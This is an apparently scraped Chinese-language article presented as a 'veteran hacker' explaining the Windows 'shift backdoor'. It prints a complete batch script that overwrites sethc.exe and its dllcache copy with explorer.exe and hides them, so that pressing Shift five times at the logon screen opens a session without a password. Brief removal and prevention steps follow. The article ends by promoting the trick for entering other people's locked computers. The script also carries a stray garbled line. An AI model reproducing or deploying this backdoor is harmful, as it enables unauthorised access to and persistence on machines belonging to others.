资深黑客介绍shift后门相关必知知识

资深黑客告诉大家需要将下面的代码直接粘贴进去,其原理的话就是需要能够利用explorer.exe这种资源管理器进程来直接替换调用相关的shift默认启动相关程序,然后的话就能直接覆盖原来windows的保护文件


shift后门利用的原理

资深黑客告诉大家需要将下面的代码直接粘贴进去,其原理的话就是需要能够利用explorer.exe这种资源管理器进程来直接替换调用相关的shift默认启动相关程序,然后的话就能直接覆盖原来windows的保护文件;使用这种方法的话也就是为了能够有效防止文件保护系统检测到文件被进行修改,如果被系统检测到后就会造成重启后这些被修改的文件还将被还原,甚至直接就会造成copy文件失去相关的作用,进行调用shift后门的话也就是真正程序上的桌面进程,大家的话也能利用这种方法直接替换屏幕键盘、放大镜和组合键。

代码:
@echo off
cls
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo.
echo Shift后门
echo.sproink
@copy c:\windows\explorer.exe c:\windows\system32\sethc.exe
@copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe
@attrib c:\windows\system32\sethc.exe +h
@attrib c:\windows\system32\dllcache\sethc.exe +h
echo 使用方法:本文件执行完毕后,
echo 在终端界面按Shift 5次即可登陆系统!
echo.
copy c:\windows\explorer.exe c:\windows\system32\sethc.exe
echo 完成百分之 50
copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe
echo 完成百分之 80
attrib c:\windows\system32\sethc.exe +h
echo 完成百分之 90
attrib c:\windows\system32\dllcache\sethc.exe +h
echo 完成百分之 100
cls
echo.
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo 后门安装完毕!
echo.
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo.
echo. & pause
exit

shift后门的清除和预防方法

shift后门清除话具体操作就是直接打开相关的控制面板,再依次进行选择点击辅助功能选项-粘滞键-设置-去掉使用的相关快捷键的勾;资深黑客建议大家需要能够修改下copy.exe的权限,推荐大家可以把电脑C盘下所有的程序都给进行修改下,让只有administrator用户才能进行有效的访问,也只有这样的话才能有效的进行清除。

还有shift后门的预防方法就是,大家需要进行连续敲五次shift键盘,接着的话就能在弹出的相关设置中直接取消连滞键就好了;当然了最重要的还有需要将attrib c:\windows\system32\sethc.exe -h

attrib c:\windows\system32\dllcache\sethc.exe -h 进行拷贝新的 c:\windows\system32\sethc.exe 文件到 c:\windows\system32\目录下;接着的话拷贝新的c:\windows\system32\dllcache\sethc.exe到c:\windows\system32\dllcache\目录下 ;还有就是在c:\windows\system32及c:\windows\system32\dllcache\下找到sethc.exe 禁止所有用户权限或拒绝访问这样就能有效的预防shift后门了。

另外资深黑客也还告诉大家,shift后门利用和清除方法相关必知知识只要大家能够进行掌握不但能够在日常中避免自己的电脑遭到不明的攻击,而且的话利用shift后门就能帮助大家轻松进入加密后的他人电脑中。